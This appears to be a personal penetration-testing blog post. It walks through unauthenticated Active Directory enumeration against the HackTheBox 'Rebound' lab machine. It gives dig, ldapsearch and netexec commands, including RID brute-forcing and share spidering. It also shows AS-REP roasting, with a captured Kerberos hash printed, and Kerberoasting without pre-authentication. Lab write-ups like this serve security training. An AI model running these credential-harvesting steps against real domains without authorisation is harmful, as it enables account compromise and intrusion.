Unauthenticated Path - with HTB rebound

graph TD
    A[Kerberos] --> B[Preauth Not required]
    B --> B1[Impacket-GetNPUsers]
    B --> B2[Impacket-UserSPNs -no-preauth]
    A --> C[SMB] --> C1[netexec]
    A --> D[LDAP]--> D1[Ldapsearch]
    A --> E[DNS] --> E1[dig]
    E --> E2[nslookup]
    A --> F[Kerberos]

Recently, I had the chance to face an Active Directory environment without any credentials. I’m not going to lie—this was a humbling experience.

Yes, there are plenty of tools, methodologies, and attack vectors out there. But if all I have is an IP address, what can I actually do? This post is a deep dive into that question, mainly for my own benefit.

This particular machine had the following ports open:

• 53
• 88
• 389
• 464
• 636

I believe SMB was also open, along with some other ports, though I don’t recall the exact ones.

One key observation was the presence of Port 53 - DNS and Port 88 - Kerberos. DNS and Kerberos? This has to be a sign, right? It’s likely this machine is a Domain Controller (DC). My first step (besides running nmap—which is basically step 0) was to start enumerating the DNS port.

Since I can’t share customer data, I'll demonstrate using HTB Rebound to pull some information.

1. Port 53 - DNS

1.1 dig

Let’s begin with port 53. According to its man page:

dig is a flexible tool for interrogating DNS name servers. It performs DNS lookups and displays the answers returned by the queried name servers. Most DNS administrators use dig to troubleshoot DNS issues due to its flexibility, ease of use, and clarity of output.

For example, using dig on google.com yields the following information:

As mentioned, a strong indicator of a Domain Controller is the presence of open ports like 53, 88, 389, 636, 3268, and 3269. Generally, a Key Distribution Center (KDC) is a Domain Controller. This insight simplifies our dig command.

Here’s what worked: after updating /etc/hosts with rebound.htb, I ran:

$ dig any rebound.htb @rebound.htb

The output confirmed DC01’s information with its IP address.

; <<>> DiG 9.19.19-1-Debian <<>> any rebound.htb @rebound.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
...

However, attempting a reverse DNS lookup didn’t yield fruitful results, likely due to my connection to a local DNS server on a VPN.

Common DNS Query Types
DNS supports various query types (A, AAAA, MX, NS, TXT, SRV, etc.). The easiest approach is to use ANY, which retrieves all records, though ANY can sometimes be blocked for security reasons.

1.1.1 Solutions for Local DNS

We can refine dig with specific subdomains:

dig A @10.10.11.231 dc01.rebound.htb

Or, querying with ldap:

dig _ldap._tcp.dc._msdcs.rebound.htb SRV @rebound.htb

Alternatively, we can use nslookup:

nslookup -type=SRV _kerberos._tcp.rebound.htb 10.10.11.231

1.2 nslookup

nslookup is another valuable tool for identifying open hosts and finding Domain Controller names.

1.3 Dnsrecon

Dnsrecon provides insight into which hosts are available.

└─$ dnsrecon -r 127.0.0.0/24 -n rebound.htb

2. Port 88 - Kerberos

Kerberos is an identity management solution for Windows authentication, also compatible with Linux. It allows users to access an organization's resources without entering a password each time—hence, it’s a Single Sign-On (SSO) solution. In a Kerberos setup, the Key Distribution Center (KDC), typically a Domain Controller, holds the keys to the Kerberos system.

In Active Directory (AD) testing, having a credential—especially a username—is crucial. In black-box engagements, OSINT through sources like LinkedIn might help identify usernames. For Kerberos-specific enumeration, kerbrute and Impacket are my preferred tools.

3. Ports 389, 636, 3268, 3269 - LDAP

To me, LDAP functions like an old phone book, allowing us to search for services. However, pulling useful data usually requires some credentials.

┌──(kali㉿kali)-[~/HTB/rebound]                                   
└─$ ldapsearch -x -H ldap://rebound.htb -x -s base                              
...snip...
rootDomainNamingContext: DC=rebound,DC=htb
...

4. 139,445 - SMB

netexec, the successor to crackmapexec, is another great tool for enumerating SMB and LDAP. It’s helpful for assessing shares and identifying permissions.

$ sudo netexec smb rebound.htb

Interestingly, there’s a distinction between a Null session (no username) and a Guest session (random username). With netexec, I observed READ permissions on IPC$ and the Shared share.

$ sudo netexec smb 10.10.11.231 -u 'a' -p '' --shares # Guest

$ sudo netexec smb 10.10.11.231 -u '' -p '' --shares # NULL

We can achieve a lot with netexec in SMB enumeration. Here’s a breakdown of commands you might use to gather as much information as possible on the target system (IP 10.10.11.231 in this case) by using netexec:

$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --disks 
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --shares
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --interfaces
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --loggedon-users
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --users
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --rid-brute
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --groups
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --local-group
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' --pass-pol
$ sudo netexec smb 10.10.11.231 -u 'tester' -p '' -M enum_av

Each of these options has a specific purpose:

• --disks: Lists available disks on the remote machine.
• --shares: Enumerates shared folders (useful for checking which folders are accessible).
• --interfaces: Retrieves network interface details.
• --loggedon-users: Lists currently logged-in users.
• --users: Enumerates all users, helpful in identifying valid usernames.
• --rid-brute: Performs RID bruteforcing to identify accessible RIDs, which can help enumerate additional users or groups.
• --groups: Lists all groups on the target.
• --local-group: Enumerates local groups and their members.
• --pass-pol: Shows password policies.
• -M enum_av: Module for enumerating antivirus software.

Retrieving and Downloading Shares

Once you know some shares exist, you can use spider_plus to crawl these shares and download data:

$ sudo netexec smb 10.10.11.231 -u 'b' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True

Explanation:

• spider_plus: This module searches and enumerates files and folders in the shared directories.
• DOWNLOAD_FLAG=True: Automatically downloads the files found.
• EXCLUDE_FILTER and EXCLUDE_EXTS: Filter out unwanted folders or file types.

The output will show share information and downloadable data if accessible, with detailed metadata saved locally.

4.1 What is RID?

RID stands for Relative Identifier. Each user and group in a domain has a unique RID that, when combined with the domain's SID (Security Identifier), creates a unique identifier for each account within the domain. When you obtain RIDs, you can map these identifiers back to usernames if you know the domain SID.

For example, you can use impacket-lookupsid to gather usernames by combining RIDs with the domain SID:

impacket-lookupsid -no-pass "tester@rebound.htb" <maxRid>

This command will reveal the Domain SID and map RIDs to actual account names, which can give you a list of all users in the domain.

4.2 Impacket-GetNPUsers

If you discover an ASREProast-enabled account, you can leverage it to request an authentication ticket without knowing the user’s password. This can be useful in password-cracking attempts later on.
==A big catch here. You will absolutely need / at the end of your target. Don't ask me why. ==

$ impacket-GetNPUsers -request -dc-ip 10.10.11.231 -dc-host rebound.htb -usersfile ./users1.txt -no-pass rebound.htb/


...snip...
$krb5asrep$23$jjones@REBOUND.HTB:ab30b6f20830a94aefba1d551572060e$4a3bb3d56c2422a68d55dda560b3f89ba61fcd0c8acb977347288530876fa80689f447c0ef7308358c681ab906f04466c69bdc38b07e38d5f6795ce665be2171bd2d81787bd2cf7c5d7fca87d3ca39db5bb770715d28fe6468abc6b6427003b7c9c850e744d3632468aabcc0ca57c730d477df1b7d1542f8db5036abb21addbc92b3d5f0da9dfb9c6db232dc5e47451fff2ed40ec6c580689c765c6c9c0435cd6da78eed12a69b9392bf6ba52f2e0addd0cde9cec13b8df9b86aa26728ae471be276682b9323ddaf406e5f325838eb8a71ad773b80a302f32d1c031ef9c02a2119ee9c8f4799239385c8
...snip

Explanation:

• GetNPUsers: Requests a TGT (Ticket Granting Ticket) for users without pre-authentication requirements.
• ASREProasting: A technique used to obtain hashes from users who don’t have the pre-authentication flag set.

When successful, it retrieves a hash for users like jjones, which you can then attempt to crack offline.

==ASREPRoast hashes are not NTLM hashes, so they cannot be used in Pass-the-Hash attacks. ==This limitation exists because:

ASREPRoast hashes are encrypted TGTs generated by the Key Distribution Center (KDC) using the user’s NT hash.
They do not contain the actual NTLM hash or password; they’re simply a Kerberos ticket encrypted with the NT hash.
To use these hashes meaningfully, you need to crack them to reveal the user’s password. Once you have the plaintext password, you can then use it for direct Kerberos authentication or to derive the NT hash for other purposes.

ASREPRoasting lets we capture a Kerberos TGT encrypted with the user’s NT hash, but we’ll need to crack it to extract the password.

4.3 Impacket-GetUserSPNs

GetUserSPNs queries the target domain for Service Principal Names (SPNs) that are associated with user accounts. This is useful for Kerberoasting attacks, where we aim to extract service account hashes.

What is SPN?

• Service Principal Name (SPN): A unique identifier for a service instance, like IMAP/mail.example.com@EXAMPLE.COM.
• User Principal Name (UPN): An identifier for a user, typically in the format user1@REALM.
  BLUF: EACH SPN must be registered in the REALM's Key Distribution Center (KDC) and issued a service key.

While I had a hard time cracking asreproast hash, I ran into 0xdfwrite up and was able to find Charlie Clark's writing regarding a new path. BLUF from 0xdf's write up.

Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials. This method of Kerberoasting has been implemented in Rubeus within this PR.

impacket-GetUserSPNs -request -dc-ip 10.10.11.231  -dc-host rebound.htb  -usersfile ./users1.txt -no-pass  rebound.htb/ -no-prea
uth jjones